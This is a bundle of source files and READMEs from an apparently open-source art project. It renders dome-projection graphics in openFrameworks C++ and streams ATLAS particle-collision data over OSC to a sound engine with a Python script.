ofPushMatrix();\n ofTranslate(_pos.x, _pos.y, zPosGui);\n ofRotateX(180.0);\n \n \n bDoFaces ? sphereDistor.draw() : displacement.mainMesh.draw();\n \n \n ofPopMatrix();\n \n \n if (bDoFaceSh){\n faceShader.end();\n }else{\n phongShader.end();\n }\n \n material.end();\n\n \n}\n//----------------------------------\nvoid SphereManager::setupGui(){\n \n //cubeSphere------------\n gui.setup(\"sphere\");\n gui.setPosition(200,300);\n gui.add(velGui.setup( \"Velocity\", 1, 0, 5 ));\n gui.add(volumeGui.setup( \"Volume\", 0.415, 0, 1 ));//0.415\n gui.add(xGui.setup( \"X\", 0.07, 0, 0.1 ));\n gui.add(yGui.setup( \"Y\", 0.0845, 0, 0.1 ));\n gui.add(radiusGui.setup( \"Radius\", 275, 0, 500 ));//275\n gui.add(resolGui.setup( \"Resolution\", 96, 1, 100 ));\n //gui.add(strengthGui.setup( \"Strength\", -200, -200, 200 ));\n //gui.add(faceNoiseGui.setup( \"FaceNoise\", 20., 0., 20.));\n //1024\n ///gui.add(zPosGui.setup( \"Z pos\", -800.0, -2000.0, 2000.0));\n //2048\n ///gui.add(zPosGui.setup( \"Z pos\", 0.0, -2000.0, 2000.0));\n //4096\n gui.add(zPosGui.setup( \"Z pos\", 1500.0, -2000.0, 2000.0));\n}\n//----------------------------------\nvoid SphereManager::drawGui(){\n gui.draw();\n}\n//----------------------------------\nvoid SphereManager::setColor(ofColor col){\n _mainColor = col;\n material.setDiffuseColor(_mainColor);//??? es diffuse el que va?\n}\n" }, { "alpha_fraction": 0.5432385206222534, "alphanum_fraction": 0.5943122506141663, "avg_line_length": 34.163265228271484, "blob_id": "37747113658cf349ead427bf8998599ade1eb5b8", "content_id": "bfea519581d9bd84e3a17e25f8be4b77b5a57573", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1723, "license_type": "no_license", "max_line_length": 67, "num_lines": 49, "path": "/Graphics/apps/final/src/particleSystem/GuiManager.cpp", "repo_name": "Opensemble/lhcvmm", "src_encoding": "UTF-8", "text": "\n#include \"GuiManager.h\"\n\nvoid GuiManager::setup(){\n \n int _w = ofGetHeight();\n \n gui.setup(\"partSystem\");\n gui.add(gDistTreshold.setup(\"dist-treshold\", 80, 0, 1000));\n gui.add(gPartsNum.setup(\"groupPartsNum\", 3, 2, 5));\n gui.add(gXvelocity.setup(\"x-velocity\", 100, 0.0, 1000.0));\n gui.add(gRadiusInit.setup(\"radius-init\", 10, 1, 300));\n gui.add(gRadiusVar.setup(\"radius-var\", 15, 0, 200));\n gui.add(gAngleInit.setup(\"angle-init\", 0.15, 0.1, 1.0));\n gui.add(gAngleVar.setup(\"angle-var\", 0.0, 0.0, 0.2));\n //nz\n gui.add(gNzAngleAmp.setup(\"nz-Angle-Amp\", 1.0, 0.0, 2.0));\n gui.add(gNzAngleFreq.setup(\"nz-Angle-Freq\", 0.001, 0.0, 0.01));\n gui.add(gNzRadAmp.setup(\"nz-Radius-Amp\", 2.0, 0.0, 5.0));\n gui.add(gNzRadFreq.setup(\"nz-Radius-Freq\", 1.0, 0.0, 10.0));\n gui.add(gNzXposAmp.setup(\"nz-Xpos-Amp\", 387.0, 0.0, _w));\n gui.add(gNzXposFreq.setup(\"nz-Xpos-Freq\", 0.05, 0.0, 0.1));\n\n}\n//-----------------------------------\nvoid GuiManager::update(){\n\n guiData[KEY_DIST_TRESHOLD] = gDistTreshold;\n guiData[KEY_PARTS_NUM] = gPartsNum;\n guiData[KEY_X_VELOCITY] = gXvelocity;\n guiData[KEY_RADIUS_INIT] = gRadiusInit;\n guiData[KEY_RADIUS_VAR] = gRadiusVar;\n guiData[KEY_ANGLE_INIT] = gAngleInit;\n guiData[KEY_ANGLE_VAR] = gAngleVar;\n //nz\n guiData[KEY_ANGLE_NZ_AMP] = gNzAngleAmp;\n guiData[KEY_ANGLE_NZ_FREQ] = gNzAngleFreq;\n guiData[KEY_RADIUS_NZ_AMP] = gNzRadAmp;\n guiData[KEY_RADIUS_NZ_FREQ]= gNzRadFreq;\n guiData[KEY_X_NZ_AMP] = gNzXposAmp;\n guiData[KEY_X_NZ_FREQ] = gNzXposFreq;\n guiData[KEY_PART_SIZE] = 10;\n\n}\n//----------------------------------\nvoid GuiManager::draw(){\n\n gui.draw();\n \n}" }, { "alpha_fraction": 0.6897106170654297, "alphanum_fraction": 0.6897106170654297, "avg_line_length": 19.733333587646484, "blob_id": "25a669092ce0b93931dc452c5c821b2eeea29087", "content_id": "592d08dfde5f1254e07993f164905cc0af15d231", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 622, "license_type": "no_license", "max_line_length": 55, "num_lines": 30, "path": "/Graphics/apps/videoTest_3/src/particleSystem/GuiManager.h", "repo_name": "Opensemble/lhcvmm", "src_encoding": "UTF-8", "text": "#pragma once\n\n#include \"ofMain.h\"\n#include \"ofxGui.h\"\n\n#include \"BosqueConstants.h\"\n\nclass GuiManager{\n\n public:\n \n void setup();\n void update();\n void draw();\n \n std::map<string, float>& getData(){return guiData;}\n \n //gui\n ofxPanel gui;\n ofxFloatSlider gDistTreshold;\n ofxIntSlider gPartsNum;\n ofxFloatSlider gXvelocity;\n ofxFloatSlider gRadiusInit, gRadiusVar;\n ofxFloatSlider gAngleInit, gAngleVar;\n ofxFloatSlider gNzAngleAmp, gNzAngleFreq;\n ofxFloatSlider gNzRadAmp, gNzRadFreq;\n ofxFloatSlider gNzXposAmp, gNzXposFreq;\n \n std::map<string, float> guiData;\n};\n" }, { "alpha_fraction": 0.5861701965332031, "alphanum_fraction": 0.6042553186416626, "avg_line_length": 19, "blob_id": "93f8c72a1f7a7f56867af4f6746e7edcf48f8b28", "content_id": "a79909a1dfb43cd1d2486bfde25c89b12a09e3ca", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1880, "license_type": "no_license", "max_line_length": 107, "num_lines": 94, "path": "/Graphics/apps/videoTest_2/src/ofApp.h", "repo_name": "Opensemble/lhcvmm", "src_encoding": "UTF-8", "text": "#pragma once\n\n#include \"ofMain.h\"\n#include \"GuiManager.h\"\n\n#include \"instancedManager.h\"\n#include \"TimelineApp.h\"\n\n#include \"ofMain.h\"\n#include \"ofxFisheye.h\"\n#include \"VideoRenderer.h\"\n\n\n//----------------\n\n#include \"Constants.h\"\n\n//---------------\n#define MAX_CUBESIZE 0.02\n#define MAX_H_RES 200\n#define MAX_V_RES 100\n#define MAX_VELOCITY 10\n\n#define MAX_NZ_TIME 50\n\n#define MAX_NZ_AMP 0.2\n#define MAX_NZ_FREQ 0.1\n#define MAX_NZ_RUG 0.03\n\n#define MAX_LIGHT_X 1024\n#define MAX_LIGHT_Y 800\n#define MAX_LIGHT_Z 800\n\nenum ValuesMode {\n GUI,\n TIMELINE\n};\n\n\nclass ofApp : public ofBaseApp{\n\tpublic:\n\t\t\n\tvoid setup();\n\tvoid update();\n\tvoid draw();\n void exit();\n \n void keyPressed(int key);\n \n void drawScene(int w, int h);\n \n void startAnimation();\n void stopAnimation();\n\n void setValuesMode(ValuesMode val){currentValuesMode = val;}\n void updateInstancedValues();\n \n //commo render vars****************************************\n \n //animation data variables----------------\n bool isAnimating;\n int frameCounter;//animation Frame Counter\n float frameDuration;//Duration in seconds of each frame\n int framesMaxNumber;//Number of frames of the entire animation\n float animValue;//Current frame in relationship with the duration of the entire animation (0.0 - 1.0)\n float animationTime;\n \n //----------------------------\n ofxFisheye fisheye;\n float fisheyeAmount;\n \n VideoRenderer renderer;\n \n ofFbo drawFbo; //FBO for drawing scene, wihtout fisheye\n \n ofTrueTypeFont\tverdana;\n \n //this App vars**************************************************\n \n GuiManager gm;\n bool bShowGui;\n \n ofEasyCam cam;\n ofLight light;\n \n ValuesMode currentValuesMode;\n \n InstancedManager instanced;\n \n shared_ptr<TimelineApp> timelineApp;\n \n \n\n};\n" }, { "alpha_fraction": 0.30127543210983276, "alphanum_fraction": 0.30594301223754883, "avg_line_length": 74.82304382324219, "blob_id": "46d837bf3c9db0534919ad543c52b6ed8f7f594a", "content_id": "572d7b841c34201f8357bd1304180e255d716ff3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 18425, "license_type": "no_license", "max_line_length": 129, "num_lines": 243, "path": "/Data/lhcvmm.py", "repo_name": "Opensemble/lhcvmm", "src_encoding": "UTF-8", "text": "import time\nimport sys\nfrom OSC import OSCClient, OSCClientError, OSCBundle, OSCMessage\nimport argparse\n\ndata_file = None\ntree = None\n\nparser = argparse.ArgumentParser(description='Process ATLAS data and streams through OSC.')\nparser.add_argument('-d','--datafile', help='Load events from csv.', default='data_files/data_Egamma_A.root')\nparser.add_argument('--host', help='OSC host.', default='127.0.0.1')\nparser.add_argument('--port', help='OSC port.', default=57120, type=int)\nparser.add_argument('-m','--messagename', help='OSC message name.', default='sound_unit')\nparser.add_argument('-r','--rate', help='Rate at which events will be read.', default=1.0, type=float)\nparser.add_argument('-l','--loop', help='Loop events sequence.', default=True, type=bool)\n#parser.add_argument('--offset', help='Offset of read data.', default=0, type=int)\nparser.add_argument('--limit', help='Limit the amount of events to read.', type=int)\n\nargs = parser.parse_args()\n\n\n# just some easy ansi colors printing: 'o' for ok, 'w' for warning, 'e' for error.\ndef printc(t, c='o'):\n print '\\033[9' + {'o': '2m','w': '3m','e': '1m'}[c] + t + '\\033[0m'\n\ndef mapValue(value, leftMin, leftMax, rightMin, rightMax):\n if value < leftMin:\n return rightMin\n if value > leftMax:\n return rightMax\n # Figure out how 'wide' each range is\n leftSpan = leftMax - leftMin\n rightSpan = rightMax - rightMin\n # Convert the left range into a 0-1 range (float)\n valueScaled = float(value - leftMin) / float(leftSpan)\n # Convert the 0-1 range into a value in the right range.\n return rightMin + (valueScaled * rightSpan)\n\ndef send_event():\n spectral_densities = ['filled', 'packed', 'opaque','translucent','transparent','empty']\n # fill blanks\n data = ['']*17*3\n #onset, continuant, termination\n data[0] = 'attack'\n\n #elegimos el de mayor momento transversal\n i = [l for l in tree.lep_pt].index(max(tree.lep_pt))\n\n #duration, based on momento transversal .. lep_pt\n data[1] = mapValue(tree.lep_pt[i],0,100000,0.1,10)\n #Spectrum types: electrones : inarmonico , muones: granular\n data[10] = 'inharmonic' if tree.lep_type[i] == 11 else 'granular'\n #Spectrum occupation: angulo\n data[11] = 'center'\n #Spectrum density: lepton energy .. lep_E\n data[16] = spectral_densities[int(mapValue(tree.lep_E[i],0,100000,0,5))]\n\n bundle = OSCBundle()\n msg = OSCMessage(\"/\"+args.messagename)\n for d in data:\n msg.append(d)\n bundle.append(msg)\n client.send(bundle)\n\n\n\n\n\ntry:\n from ROOT import TFile\n\n #initialize osc client\n client = OSCClient()\n client.connect((args.host, args.port)) # connect to SuperCollider\n\n # open test data file\n data_file = TFile.Open(args.datafile, \"read\")\n #gathers mini ttree\n tree = data_file.Get(\"mini\")\n\n printc( \"TTree 'mini' loaded from %s containing %s entries.\" % (args.datafile, tree.GetEntriesFast()),'o')\n print \"Limit events: %s.\" % args.limit\n print \"Loop enabled: %s.\" % args.loop\n print \"Start Sending events every %s seconds.\" % args.rate\n print \"Each * printed represents an event sent.\"\n print \"Press Ctrl + C to terminate.\"\n\n count = tree.GetEntriesFast()\n if args.limit and args.limit < count:\n count = args.limit\n starttime=time.time()\n\n while 1:\n for i in range(0, count):\n if(i%10==0):\n # restart * printing every 10 events\n sys.stdout.write('\\r----------\\r')\n\n # copy next entry into memory\n tree.GetEntry(i)\n send_event()\n\n time_to_sleep = args.rate - ((time.time() - starttime) % args.rate)\n sys.stdout.write('*')\n sys.stdout.flush()\n time.sleep(time_to_sleep)\n\n if not args.loop:\n break\n\nexcept OSCClientError:\n printc( \"\\OSCClientError: Connection refused to %s on port %s.\" % args.host, args.port, 'e')\nexcept KeyboardInterrupt:\n if data_file is not None:\n data_file.Close()\n print \"\\nProgram terminated.\"\nexcept ReferenceError:\n printc( \"Error: %s file not found. Data will be simulated.\" % args.datafile, 'e')\n printc( \"Download it from https://tripiana.web.cern.ch/tripiana/openensemble/ATLAS_data/data_Egamma_A.root\\n\", 'w')\nexcept AttributeError:\n printc( \"Error: Expected TTree 'mini' in %s file.\\n\" % args.datafile, 'e')\nexcept ImportError:\n printc( \"Error: Unable to load ROOT.\\n\", 'e')\n printc( \"Checkout https://github.com/Opensemble/lhcvmm/tree/master/Data#installing-root for further instructions.\\n\",'e')\n\n\n\n\n'''\nFrom varlist.pdf sent by Martin Tripiana.\n\nProposed content of slimmed down version of the a data sample for educational purposes.\nThe content presented is a further tuple produced by AnalysisTop.\n\n\n+==========================+===============+====================================================================================+\n| BRANCH NAME | TYPE | DESCRIPTION |\n+==========================+===============+====================================================================================+\n| runNumber | int | runNumber |\n+==========================+===============+====================================================================================+\n| eventNumber | int | eventNumber |\n+--------------------------+---------------+------------------------------------------------------------------------------------+\n| channelNumber | int | channelNumber |\n+--------------------------+---------------+------------------------------------------------------------------------------------+\n| lbNumber | int | lbNumber |\n+--------------------------+---------------+------------------------------------------------------------------------------------+\n| rndRunNumber | int | randomized run number mimicking run number distribution in data |\n+--------------------------+---------------+------------------------------------------------------------------------------------+\n| mu | float | average interactions per bunch crossing |\n+--------------------------+---------------+------------------------------------------------------------------------------------+\n| mcWeight | float | weight of an MC event |\n+--------------------------+---------------+------------------------------------------------------------------------------------+\n| pvxp_n | int | number of primary vertices |\n+--------------------------+---------------+------------------------------------------------------------------------------------+\n| isGoodEvent | int | summary of diverse quality flags like hfor |\n+--------------------------+---------------+------------------------------------------------------------------------------------+\n| scaleFactor | float | overall scale factor for the preselected event |\n+--------------------------+---------------+------------------------------------------------------------------------------------+\n| trigE | bool | boolean whether a standard trigger has fired in the egamma stream |\n+--------------------------+---------------+------------------------------------------------------------------------------------+\n| trigM | bool | boolean whether a standard trigger has fired in the muon stream |\n+--------------------------+---------------+------------------------------------------------------------------------------------+\n| passGRL | bool | signifies whether event passes the GRL may be put in isGoodEvent |\n+--------------------------+---------------+------------------------------------------------------------------------------------+\n| hasGoodVertex | bool | signifies whether the event has at least one good vertex |\n+--------------------------+---------------+------------------------------------------------------------------------------------+\n| lep_n | int | number of preselected leptons |\n+--------------------------+---------------+------------------------------------------------------------------------------------+\n| lep_truthMatched | vector<bool> | boolean indicating whether the lepton is matched to a truth lepton |\n+--------------------------+---------------+------------------------------------------------------------------------------------+\n| lep_trigMatched | vector<bool> | boolean signifying whether the lepton is the one triggering the event |\n+--------------------------+---------------+------------------------------------------------------------------------------------+\n| lep_pt | vector<float> | transverse momentum of the lepton |\n+--------------------------+---------------+------------------------------------------------------------------------------------+\n| lep_eta | vector<float> | pseudo-rapidity of the lepton |\n+--------------------------+---------------+------------------------------------------------------------------------------------+\n| lep_phi | vector<float> | azimuthal angle of the lepton |\n+--------------------------+---------------+------------------------------------------------------------------------------------+\n| lep_E | vector<float> | energy of the lepton |\n+--------------------------+---------------+------------------------------------------------------------------------------------+\n| lep_z0 | vector<float> | z-coordinate of the track associated to the lepton wrt. |\n+--------------------------+---------------+------------------------------------------------------------------------------------+\n| lep_charge | vector<float> | the primary vertex charge of the lepton |\n+--------------------------+---------------+------------------------------------------------------------------------------------+\n| lep_isTight | vector<bool> | boolean indicating whether the lepton is of tight quality |\n+--------------------------+---------------+------------------------------------------------------------------------------------+\n| lep_flag | vector<int> | bitmask implementing object cuts of the top group |\n+--------------------------+---------------+------------------------------------------------------------------------------------+\n| lep_type | vector<int> | number signifying the lepton type (e, mu, tau) of the lepton |\n+--------------------------+---------------+------------------------------------------------------------------------------------+\n| lep_ptcone30 | vector<float> | ptcone30 isolation for the lepton |\n+--------------------------+---------------+------------------------------------------------------------------------------------+\n| lep_etcone20 | vector<float> | etcone20 isolation for the lepton |\n+--------------------------+---------------+------------------------------------------------------------------------------------+\n| lep_trackd0pvunbiased | vector<float> | d0 of the track associated to the lepton at the point of closest approach (p.o.a.) |\n+--------------------------+---------------+------------------------------------------------------------------------------------+\n| lep_tracksigd0pvunbiased | vector<float> | d0 signifcance of the track associated to the lepton at the p.o.a. |\n+--------------------------+---------------+------------------------------------------------------------------------------------+\n| met_et | float | Transverse energy of the missing momentum vector |\n+--------------------------+---------------+------------------------------------------------------------------------------------+\n| met_phi | float | Azimuthal angle of the missing momentum vector |\n+--------------------------+---------------+------------------------------------------------------------------------------------+\n| jet_n | int | number of selected jets |\n+--------------------------+---------------+------------------------------------------------------------------------------------+\n| jet_pt | vector<float> | transverse momentum of the jet |\n+--------------------------+---------------+------------------------------------------------------------------------------------+\n| jet_eta | vector<float> | pseudorapidity of the jet |\n+--------------------------+---------------+------------------------------------------------------------------------------------+\n| jet_phi | vector<float> | azimuthal angle of the jet |\n+--------------------------+---------------+------------------------------------------------------------------------------------+\n| jet_E | vector<float> | energy of the jet |\n+--------------------------+---------------+------------------------------------------------------------------------------------+\n| jet_m | vector<float> | invariant mass of the jet |\n+--------------------------+---------------+------------------------------------------------------------------------------------+\n| jet_jvf | vector<float> | JetVertexFraction of the jet |\n+--------------------------+---------------+------------------------------------------------------------------------------------+\n| jet_flag | vector<int> | bitmask implementing object cuts of the top group |\n+--------------------------+---------------+------------------------------------------------------------------------------------+\n| jet_trueflav | vector<int> | true flavor of the jet |\n+--------------------------+---------------+------------------------------------------------------------------------------------+\n| jet_truthMatched | vector<int> | information whether the jet matches a jet on truth level |\n+--------------------------+---------------+------------------------------------------------------------------------------------+\n| jet_SV0 | vector<float> | SV0 weight of the jet |\n+--------------------------+---------------+------------------------------------------------------------------------------------+\n| jet_MV1 | vector<float> | MV1 weight of the jet |\n+--------------------------+---------------+------------------------------------------------------------------------------------+\n| scaleFactor_BTAG | float | scalefactor for btagging |\n+--------------------------+---------------+------------------------------------------------------------------------------------+\n| scaleFactor_ELE | float | scalefactor for electron eciency |\n+--------------------------+---------------+------------------------------------------------------------------------------------+\n| scaleFactor_JVFSF | float | scalefactor for jet vertex fraction |\n+--------------------------+---------------+------------------------------------------------------------------------------------+\n| scaleFactor_MUON | float | scalefactor for muon eciency |\n+--------------------------+---------------+------------------------------------------------------------------------------------+\n| scaleFactor_PILEUP | float | scalefactor for pileup reweighting |\n+--------------------------+---------------+------------------------------------------------------------------------------------+\n| scaleFactor_TRIGGER | float | scalefactor for trigger |\n+--------------------------+---------------+------------------------------------------------------------------------------------+\n| scaleFactor_ZVERTEX | float | scalefactor for z-vertex reweighting |\n+==========================+===============+====================================================================================+\n\n\n'''\n" }, { "alpha_fraction": 0.6056910753250122, "alphanum_fraction": 0.619918704032898, "avg_line_length": 20.39130401611328, "blob_id": "e747c0c6859674652effe2efbcb28382678afe7b", "content_id": "3315f2368fc1b2ca8f8fc5174190b8577c3af024", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 492, "license_type": "no_license", "max_line_length": 74, "num_lines": 23, "path": "/Graphics/examples/ofxFisheyeExample/src/main.cpp", "repo_name": "Opensemble/lhcvmm", "src_encoding": "UTF-8", "text": "#include \"ofMain.h\"\n#include \"ofApp.h\"\n\n//========================================================================\nint main( ){\n\n\tofSetLogLevel(OF_LOG_VERBOSE);\n\tint windowWidth = 768;\n\tint windowHeight = 768;\n \n\t#ifdef TARGET_OPENGLES\n ofGLESWindowSettings settings;\n\tsettings.width = windowWidth;\n\tsettings.height = windowHeight;\n\tsettings.setGLESVersion(3);\n\tofCreateWindow(settings);\n\t#else\n\tofSetupOpenGL(windowWidth, windowHeight, OF_WINDOW);\n\t#endif\n\n\tofRunApp( new ofApp());\n\n}\n" }, { "alpha_fraction": 0.8005502223968506, "alphanum_fraction": 0.8046767711639404, "avg_line_length": 47.46666717529297, "blob_id": "045a9069d208fc484286866f4d22e0fe40ba253d", "content_id": "0d9305d716f6ac140c1e9ef02e277ca503bfc82a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 727, "license_type": "no_license", "max_line_length": 229, "num_lines": 15, "path": "/Graphics/examples/ofxDomemasterExample/README.md", "repo_name": "Opensemble/lhcvmm", "src_encoding": "UTF-8", "text": "# ofxDomemasterExample\n\n### Description\nExample app of the ofxDomemaster addon.\nThis addon uses a multi-camera technique to generate a 5-sided cube map and renders each view to pregenerated meshes for spherical distortion.\nA circular image mask overlays the fisheye render to create a circular composition.\n\nUse of this addon requires that you copy the domemaster folder located within the example project's bin folder to your project.\n\n\n### Dependencies\n* addons: ofxDomemaster.\n\n### Compilation\nThe Graphics Engine of the LHCVMM is developed using openFrameworks v0.9 (www.openFrameworks.com). To compile the examples in this repository you need to clone lhcvmm main directory into OF root dir (OF_ROOT_DIR/lhcvmm/Graphics/)\n" }, { "alpha_fraction": 0.8002915382385254, "alphanum_fraction": 0.8032069802284241, "avg_line_length": 61.3636360168457, "blob_id": "ac362c31254499b2f0c0e9f249794077123f7d7e", "content_id": "e58523b77a43d66f1c132694a6e29754ce7cbf55", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 686, "license_type": "permissive", "max_line_length": 226, "num_lines": 11, "path": "/Graphics/addons/ofxDomemaster/README.md", "repo_name": "Opensemble/lhcvmm", "src_encoding": "UTF-8", "text": "ofxDomemaster\n=============\n\nAn openFrameworks addon for creating domemasters. A domemaster is the standard format for projection within digital dome theatres. Simply put it is a square composition with a circular mask and fisheye distortion.\n\nThis addon uses a multi-camera technique to generate a 5-sided cube map and renders each view to pregenerated meshes for spherical distortion. A circular image mask overlays the fisheye render to create a circular composition.\n\nUse of this addon requires that you copy the domemaster folder located within the example project's bin folder to your project. \n\nMesh and mask assets generated by Paul Bourke: \nhttp://paulbourke.net/dome/unity3d/\n" }, { "alpha_fraction": 0.5492937564849854, "alphanum_fraction": 0.5651130080223083, "avg_line_length": 35.49226760864258, "blob_id": "d707a9e72db24d0323ba0a653358e4f88a46159d", "content_id": "9ad831f6932bf959fe7b87eeb13c09bebbc25571", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 14160, "license_type": "no_license", "max_line_length": 140, "num_lines": 388, "path": "/Graphics/apps/videoTest_2/src/ofApp.cpp", "repo_name": "Opensemble/lhcvmm", "src_encoding": "UTF-8", "text": "#include \"ofApp.h\"\n\n//--------------------------------------------------------------\nvoid ofApp::setup(){\n \n ofSetLogLevel(OF_LOG_VERBOSE);\n \n //openGl and GLSL info------\n ofLogVerbose()<<\"GLVersionMajor: \"<< ofGetGLRenderer()->getGLVersionMajor();\n ofLogVerbose()<<\"GLVersionMinor: \"<< ofGetGLRenderer()->getGLVersionMinor();\n ofLogVerbose()<<\"GLSL Version: \"<< ofGLSLVersionFromGL(ofGetGLRenderer()->getGLVersionMajor(), ofGetGLRenderer()->getGLVersionMinor());\n \n //renderer setup-------------------\n ofSetFrameRate(FRAME_RATE);\n frameDuration = 1.0 / FRAME_RATE;\n framesMaxNumber = DURATION * FRAME_RATE;\n frameCounter = 0;\n isAnimating = false;\n ofLogVerbose()<<\"ANIMATION INFO ---- \";\n ofLogVerbose()<<\"Frame Rate: \"<< FRAME_RATE;\n ofLogVerbose()<<\"Frame Duration: \"<< frameDuration;\n ofLogVerbose()<<\"Frames Max Number: \"<< framesMaxNumber <<\"\\n---------\";\n \n \n fisheye.setup(tVariableFisheye);\n fisheyeAmount = 0.0;\n \n renderer.setup(FRAME_RATE, PNG_SEQUENCE, r1024);\n \n drawFbo.allocate(renderer.getFboWidth(), renderer.getFboHeight());\n verdana.load(\"fonts/verdana.ttf\", renderer.getFboWidth()*0.04, true, true);\n \n \n //shaders---------------------\n#ifdef TARGET_OPENGLES\n\tshader.load(\"shadersES2/shader\");\n#else\n\tif(ofIsGLProgrammableRenderer()){\n ofLogVerbose()<<\"Using ProgrammableRenderer\";\n\t}else{\n ofLogVerbose()<<\"NOT Using ProgrammableRenderer\";\n\t}\n#endif\n \n //gui-------------\n gm.setup();\n\n ofSetBackgroundColor(80);\n \n cam.lookAt(ofVec3f( ofGetWidth()*.5, ofGetHeight()*.5, 0.0));\n light.setPosition(ofGetWidth()*.5, ofGetHeight()*.5, 150.0);\n light.setPointLight();\n \n instanced.setup();\n instanced.setLimits(ofVec3f(renderer.getFboWidth(), renderer.getFboHeight(), 100));\n instanced.setOrientation(ofVec3f(1,1,1));\n instanced.setColor(ofColor::white);\n \n currentValuesMode = TIMELINE;\n bShowGui = false;\n\n}\n\n//--------------------------------------------------------------\nvoid ofApp::update(){\n //display frame rate as window title\n ofSetWindowTitle(ofToString(ofGetFrameRate()));\n\n //update instancedManager values\n updateInstancedValues();\n \n //animation data update\n if(isAnimating){\n frameCounter++;\n timelineApp->timeline.setCurrentFrame(frameCounter);\n animationTime = frameCounter * frameDuration;\n animValue = animationTime/DURATION;\n \n //end recording and animation at 15\"\n if (frameCounter>=framesMaxNumber){\n stopAnimation();\n renderer.stopRecording();\n }\n }\n //-----------------------------------\n \n int rw = renderer.getFboWidth();\n int rh = renderer.getFboHeight();\n \n //draw openGL scene in drawFbo\n drawFbo.begin();\n ofClear(0);\n drawScene(rw, rh);\n drawFbo.end();\n \n //fisheye with timeline\n fisheyeAmount = timelineApp->timeline.getValue(\"fisheye\");\n \n renderer.getFbo()->begin();\n ofClear(0);\n fisheye.begin(drawFbo.getTexture(), rw, rh, fisheyeAmount);\n glBegin(GL_QUADS);\n glTexCoord2f(0, 0); glVertex3f(0, 0, 0);\n glTexCoord2f(rw, 0); glVertex3f(rw, 0, 0);\n glTexCoord2f(rw, rh); glVertex3f(rw, rh, 0);\n glTexCoord2f(0,rh); glVertex3f(0, rh, 0);\n glEnd();\n fisheye.end();\n renderer.getFbo()->end();\n \n //Record Renderer's FBO into a .mov file or png sequence\n renderer.update();\n\n}\n\n//--------------------------------------------------------------\nvoid ofApp::draw(){\n \n //drawScene(ofGetHeight(), ofGetWidth());\n if (bShowGui) gm.gui.draw();\n \n //Scaled Renderer's FBO preview----------\n renderer.draw(250, 0, 512, 512);\n \n //Recording indicator-------------------\n if(renderer.getIsRecording()){\n ofPushStyle();\n ofPushMatrix();\n ofTranslate(ofGetWidth() - 60, 60);\n ofSetColor(255, 0, 0);\n ofDrawCircle(0,0, 40);\n ofSetColor(ofColor::white);\n ofDrawBitmapString(\"REC\", -10, 0);\n ofPopMatrix();\n ofPopStyle();\n }\n \n //Display Key commands-----------------\n ofPushStyle();\n string keys = \"KEY COMMANDS:\";\n keys += \"\\nSpacebar: START/STOP Animation\"\n \"\\nr: START/STOP Recording & Animation\"\n \"\\np: Secuencia Png\"\n \"\\nm: Archivo MOV-H264\"\n \"\\n1: 256x256\"\n \"\\n2: 512x512\"\n \"\\n3: 1024x1024\"\n \"\\n4: 2048x2048\"\n \"\\n5: 4096x4096\";\n ofSetColor(ofColor::white);\n ofDrawBitmapString(keys, 10, 20);\n ofPopStyle();\n \n //Display Info-----------------\n ofPushStyle();\n string info = \"INFO: \";\n info += \"\\nfps: \"+ofToString(ofGetFrameRate())\n + \"\\nFBO output res: \" + renderer.getResolutionAsString()\n + \"\\nREC mode: \" + renderer.getRecordingModeAsString();\n if(renderer.getIsRecording()){\n info += \"\\nRECORDING FRAME NUM: \" + ofToString(ofGetFrameNum() - renderer.getLastFrameMarker());\n }\n ofSetColor(ofColor::yellow);\n ofDrawBitmapString(info, 10, ofGetHeight()-100);\n ofPopStyle();\n\n}\n//--------------------------------------------------------------\nvoid ofApp::exit(){\n renderer.exit();\n}\n//--------------------------------------------------------------\nvoid ofApp::drawScene(int w, int h){\n \n if(gm.gUseLight){\n ofEnableLighting();\n light.enable();\n }\n \n if(gm.gUseCam)cam.begin();\n \n if(gm.gAxis)ofDrawAxis(200);\n //light.draw();\n \n instanced.draw();\n \n if(gm.gUseCam)cam.end();\n \n if(gm.gUseLight){\n light.disable();\n ofDisableLighting();\n }\n \n //INFO DISPLAY--------------------------------\n ofPushStyle();\n ofSetColor(ofColor::white);\n string sceneInfo = \"Time: \" + ofToString(animationTime, 2)\n + \"\\nFisheye: \" + ofToString(fisheyeAmount, 2);\n verdana.drawString(sceneInfo, w*.35, h-h*.15);\n ofPopStyle();\n\n}\n\n//--------------------------------------------------------------\nvoid ofApp::updateInstancedValues(){\n \n float w = renderer.getFboWidth();\n \n if(currentValuesMode==GUI){\n \n if(!gm.gMode)instanced.setMode(LINEAL);\n else if(gm.gMode && !gm.gRadMode) instanced.setMode(RAD_CONCENTRIC);\n else if(gm.gMode && gm.gRadMode){\n instanced.setMode(RAD_CENTRIFUGE);\n instanced.setRadDeform(gm.gRadDeform);\n }\n \n instanced.setWidth(gm.gWidth);\n instanced.setHeight(gm.gHeight);\n instanced.setCubeSize(gm.gCubesizeUnified * MAX_CUBESIZE*w);\n // instanced.setCubeSize(ofVec3f(gCubesize->x * MAX_CUBESIZE,\n // gCubesize->y * MAX_CUBESIZE,\n // gCubesize->z * MAX_CUBESIZE));\n instanced.setMaskRadius(gm.gMaskRadius);\n instanced.setHres(gm.gHres * MAX_H_RES);\n instanced.setVres(gm.gVres * MAX_V_RES);\n instanced.setVelocity(gm.gVelocity * MAX_VELOCITY);\n instanced.setXpos(gm.gXpos);\n instanced.setYpos(gm.gYpos);\n //nz\n instanced.setNzTime(gm.gNzTime * MAX_NZ_TIME);\n \n instanced.setXnzAmp(gm.gNzXAmp * MAX_NZ_AMP*w);\n instanced.setXnzFreq(gm.gNzXFreq * MAX_NZ_FREQ);\n instanced.setXnzRug(gm.gNzXRug * MAX_NZ_RUG*w);\n \n instanced.setYnzAmp(gm.gNzYAmp * MAX_NZ_AMP*w);\n instanced.setYnzFreq(gm.gNzYFreq * MAX_NZ_FREQ);\n instanced.setYnzRug(gm.gNzYRug * MAX_NZ_RUG*w);\n \n instanced.setZnzAmp(gm.gNzZAmp * MAX_NZ_AMP*w);\n 